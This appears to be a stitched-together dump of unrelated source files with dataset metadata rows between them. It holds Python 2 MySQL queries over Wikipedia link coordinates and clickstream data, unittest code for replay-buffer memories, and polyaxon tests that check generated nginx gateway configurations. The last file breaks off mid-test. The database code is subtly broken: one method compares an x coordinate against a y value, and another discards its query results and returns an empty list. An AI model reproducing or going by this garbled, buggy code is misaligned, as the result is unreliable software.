self._cursor.execute('select l.source_article_id, l.target_article_id, l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, c.counts, p.page_length_1920_1080 from links l, clickstream_derived c, page_length p where l.source_article_id=c.prev_id and l.target_article_id=c.curr_id and c.link_type_derived like %s and l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0 and l.source_article_id!=l.target_article_id;', ("internal%",))
result = self._cursor.fetchall()
for row in result:
link = {}
link['key']= row[0], row[1]
link['x'] = row[2]
link['y'] = row[3]
link['counts'] = row[4]
link['page_length'] = row[5]
coords.append(link)
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return coords
def retrieve_all_links_multpile_occ(self):
"""retrieves all xy coord for all links in wikipeida.
@return a list of coords holding the following keys:
'source_article_id': the wikipedia article id
'x': x position on screen
'y': y position on screen
"""
coords = []
try:
self._cursor.execute('SELECT source_article_id, target_article_id, target_x_coord_1920_1080, target_y_coord_1920_1080 FROM links where target_x_coord_1920_1080 is not Null and target_y_coord_1920_1080 is not Null and target_x_coord_1920_1080!=0 and target_y_coord_1920_1080!=0 and source_article_id!=target_article_id;')
result = self._cursor.fetchall()
for row in result:
link = {}
link['key']= row[0], row[1]
link['x'] = row[2]
link['y'] = row[3]
coords.append(link)
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return coords
def retrieve_all_links_coords_clicks_first_occ(self):
"""retrieves all xy coord for all links in wikipeida.
@return a list of coords holding the following keys:
'source_article_id': the wikipedia article id
'x': x position on screen
'y': y position on screen
"""
links = {}
try:
self._cursor.execute('select l.source_article_id, l.target_article_id, l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, c.counts, p.page_length_1920_1080 from links l, clickstream_derived c, page_length p where l.source_article_id=c.prev_id and l.target_article_id=c.curr_id and c.link_type_derived like %s and l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0 and l.source_article_id!=l.target_article_id;', ("internal%",))
result = self._cursor.fetchall()
for row in result:
link = {}
link['x'] = row[2]
link['y'] = row[3]
link['counts'] = row[4]
link['page_length'] = row[5]
try:
prev = links[row[0], row[1]]
if prev['y'] > link['y']:
links[row[0], row[1]] = link
if prev['y']==link['y']:
if prev['x']>link['y']:
links[row[0], row[1]] = link
except:
links[row[0], row[1]] = link
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return links
def retrieve_all_links_coords_page_rank(self):
results = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_page_rank, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return results
def retrieve_all_links_coords_indegree(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_in_degree, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_outdegree(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_out_degree, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_degree(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_degree, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_clustering(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_local_clust, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_kcore(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_kcore, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_all_links_coords_eigenvector(self):
result = []
try:
self._cursor.execute('select l.target_x_coord_1920_1080, l.target_y_coord_1920_1080, l.target_article_eigen_centr, p.page_length_1920_1080 from link_features l, page_length p where l.source_article_id = p.id and l.target_x_coord_1920_1080 is not Null and l.target_y_coord_1920_1080 is not Null and l.target_x_coord_1920_1080!=0 and l.target_y_coord_1920_1080!=0;')
result = self._cursor.fetchall()
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return result
def retrieve_internalcounts_degree(self):
in_degree = []
out_degree = []
degree = []
page_rank = []
kcore = []
local_clust = []
eigenvector_centr = []
hub = []
authority = []
counts = []
try:
self._cursor.execute('select a.in_degree, a.out_degree, a.degree, a.page_rank, a.kcore,a.local_clustering, a.eigenvector_centr, a.hits_hub, a.hits_authority, sum(c.counts) as counts from clickstream_derived c, article_features a where c.link_type_derived= %s and a.id=c.curr_id group by c.curr_id;', ("internal-link",))
results = self._cursor.fetchall()
for row in results:
in_degree.append(float(row[0]))
out_degree.append(float(row[1]))
degree.append(float(row[2]))
page_rank.append(float(row[3]))
kcore.append(float(row[4]))
local_clust.append(float(row[5]))
eigenvector_centr.append(float(row[6]))
hub.append(float(row[7]))
authority.append(float(row[8]))
counts.append(float(row[9]))
except MySQLdb.Error, e:
logging.error('error retrieving xy coord for all links links %s (%d)' % (e.args[1], e.args[0]))
return in_degree,out_degree,degree, page_rank, kcore, local_clust, eigenvector_centr, hub, authority, counts
| 49.389868
| 576
| 0.593141
| 2,985
| 22,423
| 4.238191
| 0.071022
| 0.047427
| 0.067821
| 0.041736
| 0.818829
| 0.804363
| 0.790293
| 0.780808
| 0.768556
| 0.756067
| 0
| 0.050384
| 0.308701
| 22,423
| 453
| 577
| 49.498896
| 0.765757
| 0.014985
| 0
| 0.601942
| 0
| 0.038835
| 0.351256
| 0.147149
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.006472
| null | null | 0.003236
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a57fc5fa792d8f5fdaf2385dfdf602cdb2d94b
| 12,684
|
py
|
Python
|
surreal/tests/components/test_memories_generically.py
|
rosea-tf/surreal
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
[
"Apache-2.0"
] | 6
|
2019-12-17T17:56:26.000Z
|
2022-01-13T20:54:06.000Z
|
surreal/tests/components/test_memories_generically.py
|
rosea-tf/surreal
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
[
"Apache-2.0"
] | 4
|
2019-11-04T07:17:27.000Z
|
2019-11-04T07:19:25.000Z
|
surreal/tests/components/test_memories_generically.py
|
rosea-tf/surreal
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
[
"Apache-2.0"
] | 2
|
2019-11-29T15:38:54.000Z
|
2020-02-24T11:24:04.000Z
|
# Copyright 2019 ducandu GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import unittest
from surreal.components.memories import PrioritizedReplayBuffer, ReplayBuffer
from surreal.spaces import Bool, Dict, Float, Int
from surreal.tests.test_util import check
from surreal.utils.errors import SurrealError
class TestMemoriesGenerically(unittest.TestCase):
"""
Tests different generic functionalities of Memories.
"""
record_space = Dict(
states=dict(state1=float, state2=Float(shape=(2,))),
actions=dict(action1=int),
reward=float,
terminals=bool,
main_axes="B"
)
record_space_no_next_state = Dict(s=dict(s1=float, s2=float), a=dict(a1=Int(10)), r=float, t=Bool(), main_axes="B")
capacity = 10
alpha = 1.0
beta = 1.0
max_priority = 1.0
def test_next_state_handling(self):
"""
Tests if next-states can be stored efficiently (not using any space!) in the memory.
NOTE: The memory does not care about terminal signals, it will always return the n-next-in-memory state
regardless of whether this is a useful state (terminal=False) or not (terminal=True). In case of a
terminal=True, the next state (whether it be the true terminal state, the reset state, or any other random
state) does not matter anyway.
"""
capacity = 10
batch_size = 2
# Test all classes of memories.
for class_ in [ReplayBuffer, PrioritizedReplayBuffer]:
memory = class_(record_space=self.record_space_no_next_state, capacity=capacity,
next_record_setup=dict(s="s_"))
# Insert n records (inserts must always be batch-size).
data = dict(
s=dict(s1=np.array([0.0, 1.0]), s2=np.array([2.0, 3.0])),
a=np.array([0, 1]), r=np.array([-0.0, -1.0]), t=np.array([False, True]),
s_=dict(s1=np.array([0.1, 1.1]), s2=np.array([2.1, 3.1]))
)
memory.add_records(data)
# Check, whether inserting the wrong batch size raises Exception.
try:
data = self.record_space_no_next_state.sample(batch_size + 1)
data["s_"] = self.record_space_no_next_state["s"].sample(batch_size)
memory.add_records(data)
assert False, "ERROR: Should not get here. Error is expected."
except SurrealError:
pass
# Assert we can now fetch n elements.
retrieved_data = memory.get_records(num_records=1)
self.assertEqual(1, len(retrieved_data["t"]))
# Check the next state.
if retrieved_data["s"]["s1"][0] == 0.0:
self.assertTrue(retrieved_data["s_"]["s1"] == 0.1 and retrieved_data["s_"]["s2"] == 2.1)
else:
self.assertTrue(retrieved_data["s"]["s1"] == 1.0)
self.assertTrue(retrieved_data["s_"]["s1"] == 1.1 and retrieved_data["s_"]["s2"] == 3.1)
# Insert another 2xn records and then check for correct next-state returns when getting records.
data = dict(
s=dict(s1=np.array([0.1, 1.1]), s2=np.array([2.1, 3.1])),
a=np.array([2, 3]), r=np.array([-2.0, -3.0]), t=np.array([False, False]),
s_=dict(s1=np.array([0.2, 1.2]), s2=np.array([2.2, 3.2]))
)
memory.add_records(data)
data = dict(
s=dict(s1=np.array([0.2, 1.2]), s2=np.array([2.2, 3.2])),
a=np.array([4, 5]), r=np.array([-4.0, -5.0]), t=np.array([True, True]),
s_=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3]))
)
memory.add_records(data)
for _ in range(20):
retrieved_data = memory.get_records(num_records=2)
self.assertEqual(2, len(retrieved_data["t"]))
# Check the next states (always 0.1 larger than state).
for i in range(2):
check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.1)
check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.1)
self.assertTrue(memory.size == 6)
# Insert up to capacity and check again.
data = dict(
s=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3])),
a=np.array([6, 7]), r=np.array([-6.0, -7.0]), t=np.array([True, False]),
s_=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4]))
)
memory.add_records(data)
data = dict(
s=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4])),
a=np.array([8, 9]), r=np.array([-8.0, -9.0]), t=np.array([False, False]),
s_=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5]))
)
memory.add_records(data)
for _ in range(20):
retrieved_data = memory.get_records(num_records=3)
self.assertEqual(3, len(retrieved_data["t"]))
# Check the next states (always 0.1 larger than state).
for i in range(3):
check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.1)
check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.1)
self.assertTrue(memory.size == 10)
# Go a little bit (one batch) over capacity and check again.
data = dict(
s=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5])),
a=np.array([10, 11]), r=np.array([-10.0, -11.0]), t=np.array([True, True]),
s_=dict(s1=np.array([0.6, 1.6]), s2=np.array([2.6, 3.6]))
)
memory.add_records(data)
for _ in range(20):
retrieved_data = memory.get_records(num_records=4)
self.assertEqual(4, len(retrieved_data["t"]))
# Check the next states (always 0.1 larger than state).
for i in range(4):
check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.1)
check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.1)
self.assertTrue(memory.size == 10)
def test_next_state_handling_with_n_step(self):
"""
Tests if next-states can be stored efficiently (not using any space!) in the memory using an n-step memory.
NOTE: The memory does not care about terminal signals, it will always return the n-next-in-memory state
regardless of whether this is a useful state (terminal=False) or not (terminal=True). In case of a
terminal=True, the next state (whether it be the true terminal state, the reset state, or any other random
state) does not matter anyway.
"""
capacity = 10
batch_size = 2
# Test all classes of memories.
for class_ in [ReplayBuffer, PrioritizedReplayBuffer]:
memory = class_(record_space=self.record_space_no_next_state, capacity=capacity,
next_record_setup=dict(s="s_", n_step=3))
# Insert n records (inserts must always be batch-size).
data = dict(
s=dict(s1=np.array([0.0, 1.0]), s2=np.array([2.0, 3.0])),
a=np.array([0, 1]), r=np.array([-0.0, -1.0]), t=np.array([False, True]),
s_=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3])) # s' is now the n-step s'
)
memory.add_records(data)
# Check, whether inserting the wrong batch size raises Exception.
try:
data = self.record_space_no_next_state.sample(batch_size + 1)
data["s_"] = self.record_space_no_next_state["s"].sample(batch_size)
memory.add_records(data)
assert False, "ERROR: Should not get here. Error is expected."
except SurrealError:
pass
# Assert we cannot pull samples yet. n-step is 3, so we need at least 3 elements in memory.
try:
memory.get_records(num_records=1)
assert False, "ERROR: Should not get here. Error is expected."
except SurrealError:
pass
# Insert another 2xn records and then check for correct next-state returns when getting records.
data = dict(
s=dict(s1=np.array([0.1, 1.1]), s2=np.array([2.1, 3.1])),
a=np.array([2, 3]), r=np.array([-2.0, -3.0]), t=np.array([False, False]),
s_=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4])) # s' is now the n-step s'
)
memory.add_records(data)
data = dict(
s=dict(s1=np.array([0.2, 1.2]), s2=np.array([2.2, 3.2])),
a=np.array([4, 5]), r=np.array([-4.0, -5.0]), t=np.array([True, True]),
s_=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5])) # s' is now the n-step s'
)
memory.add_records(data)
for _ in range(20):
retrieved_data = memory.get_records(num_records=2)
self.assertEqual(2, len(retrieved_data["t"]))
# Check the next states (always 0.1 larger than state).
for i in range(2):
check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.3)
check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.3)
self.assertTrue(memory.size == 6)
# Insert up to capacity and check again.
data = dict(
s=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3])),
a=np.array([6, 7]), r=np.array([-6.0, -7.0]), t=np.array([True, False]),
s_=dict(s1=np.array([0.6, 1.6]), s2=np.array([2.6, 3.6]))
)
memory.add_records(data)
data = dict(
s=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4])),
a=np.array([8, 9]), r=np.array([-8.0, -9.0]), t=np.array([False, False]),
s_=dict(s1=np.array([0.7, 1.7]), s2=np.array([2.7, 3.7]))
)
memory.add_records(data)
for _ in range(20):
retrieved_data = memory.get_records(num_records=3)
self.assertEqual(3, len(retrieved_data["t"]))
# Check the next states (always 0.1 larger than state).
for i in range(3):
check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.3)
check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.3)
self.assertTrue(memory.size == 10)
# Go a little bit (two batches) over capacity and check again.
data = dict(
s=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5])),
a=np.array([10, 11]), r=np.array([-10.0, -11.0]), t=np.array([True, True]),
s_=dict(s1=np.array([0.8, 1.8]), s2=np.array([2.8, 3.8]))
)
memory.add_records(data)
data = dict(
s=dict(s1=np.array([0.6, 1.6]), s2=np.array([2.6, 3.6])),
a=np.array([10, 11]), r=np.array([-10.0, -11.0]), t=np.array([False, False]),
s_=dict(s1=np.array([0.9, 1.9]), s2=np.array([2.9, 3.9]))
)
memory.add_records(data)
for _ in range(20):
retrieved_data = memory.get_records(num_records=4)
self.assertEqual(4, len(retrieved_data["t"]))
# Check the next states (always 0.1 larger than state).
for i in range(4):
check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.3)
check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.3)
self.assertTrue(memory.size == 10)
| 46.804428
| 119
| 0.534926
| 1,858
| 12,684
| 3.558665
| 0.121636
| 0.09634
| 0.036298
| 0.03539
| 0.823654
| 0.810345
| 0.800061
| 0.77556
| 0.77556
| 0.77193
| 0
| 0.057699
| 0.303138
| 12,684
| 270
| 120
| 46.977778
| 0.69035
| 0.22146
| 0
| 0.717514
| 0
| 0
| 0.02708
| 0
| 0
| 0
| 0
| 0
| 0.107345
| 1
| 0.011299
| false
| 0.016949
| 0.033898
| 0
| 0.084746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a78c12f025e178d8991c77aff7ce7cb5293841
| 56,774
|
py
|
Python
|
cli/tests/test_proxies/test_gateway/test_schemas.py
|
polyaxon/cli
|
3543c0220a8a7c06fc9573cd2a740f8ae4930641
|
[
"Apache-2.0"
] | null | null | null |
cli/tests/test_proxies/test_gateway/test_schemas.py
|
polyaxon/cli
|
3543c0220a8a7c06fc9573cd2a740f8ae4930641
|
[
"Apache-2.0"
] | 1
|
2022-01-24T11:26:47.000Z
|
2022-03-18T23:17:58.000Z
|
cli/tests/test_proxies/test_gateway/test_schemas.py
|
polyaxon/cli
|
3543c0220a8a7c06fc9573cd2a740f8ae4930641
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2018-2022 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from polyaxon import settings
from polyaxon.proxies.schemas.gateway.api import get_api_location_config
from polyaxon.proxies.schemas.gateway.auth import (
get_auth_config,
get_auth_location_config,
)
from polyaxon.proxies.schemas.gateway.dns import get_dns_config, get_resolver
from polyaxon.proxies.schemas.gateway.redirect import get_redirect_config
from polyaxon.proxies.schemas.gateway.services import (
get_plugins_location_config,
get_services_location_config,
)
from polyaxon.proxies.schemas.gateway.ssl import get_ssl_config
from polyaxon.proxies.schemas.gateway.streams import get_streams_location_config
from polyaxon.utils.test_utils import BaseTestCase
@pytest.mark.proxies_mark
class TestGatewaySchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_ssl(self):
expected = r"""
# SSL
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:50m;
ssl_session_tickets off;
# intermediate configuration
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# OCSP Stapling
ssl_stapling on;
ssl_stapling_verify on;
resolver 1.1.1.1 1.0.0.1 [2606:4700:4700::1111] [2606:4700:4700::1001] 8.8.8.8 8.8.4.4 [2001:4860:4860::8888] [2001:4860:4860::8844] 208.67.222.222 208.67.220.220 [2620:119:35::35] [2620:119:53::53] valid=60s;
resolver_timeout 2s;
ssl_certificate /etc/ssl/polyaxon/polyaxon.com.crt;
ssl_certificate_key /etc/ssl/polyaxon/polyaxon.com.key;
""" # noqa
assert get_ssl_config() == expected
expected = r"""
# SSL
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:50m;
ssl_session_tickets off;
# intermediate configuration
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# OCSP Stapling
ssl_stapling on;
ssl_stapling_verify on;
resolver 1.1.1.1 1.0.0.1 [2606:4700:4700::1111] [2606:4700:4700::1001] 8.8.8.8 8.8.4.4 [2001:4860:4860::8888] [2001:4860:4860::8844] 208.67.222.222 208.67.220.220 [2620:119:35::35] [2620:119:53::53] valid=60s;
resolver_timeout 2s;
ssl_certificate /foo/polyaxon.com.crt;
ssl_certificate_key /foo/polyaxon.com.key;
""" # noqa
settings.PROXIES_CONFIG.ssl_path = "/foo"
assert get_ssl_config() == expected
def test_redirect_config(self):
expected = r"""
server {
listen 80;
return 301 https://$host$request_uri;
}
""" # noqa
settings.PROXIES_CONFIG.ssl_enabled = False
assert get_redirect_config() == ""
settings.PROXIES_CONFIG.ssl_enabled = True
assert get_redirect_config() == expected
@pytest.mark.proxies_mark
class TestGatewayServicesSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_service_dns_resolver(self):
settings.PROXIES_CONFIG.auth_enabled = False
expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_use_resolver = False
resolver = get_resolver()
assert (
get_services_location_config(resolver=resolver, auth="", rewrite=False)
== expected
)
expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
settings.PROXIES_CONFIG.dns_use_resolver = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=False
)
== expected
)
def test_services_dns_backend(self):
settings.PROXIES_CONFIG.auth_enabled = False
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(resolver=resolver, auth="", rewrite=False)
== expected
)
expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=False
)
== expected
)
def test_services_dns_prefix(self):
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.dns_use_resolver = True
expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver coredns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=False
)
== expected
)
expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.new-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
""" # noqa
settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
resolver = get_resolver()
assert (
get_services_location_config(
resolver=resolver, auth=get_auth_config(), rewrite=False
)
== expected
)
@pytest.mark.proxies_mark
class TestGatewayRewriteServicesSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
def test_service_dns_resolver(self):
settings.PROXIES_CONFIG.auth_enabled = False
expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
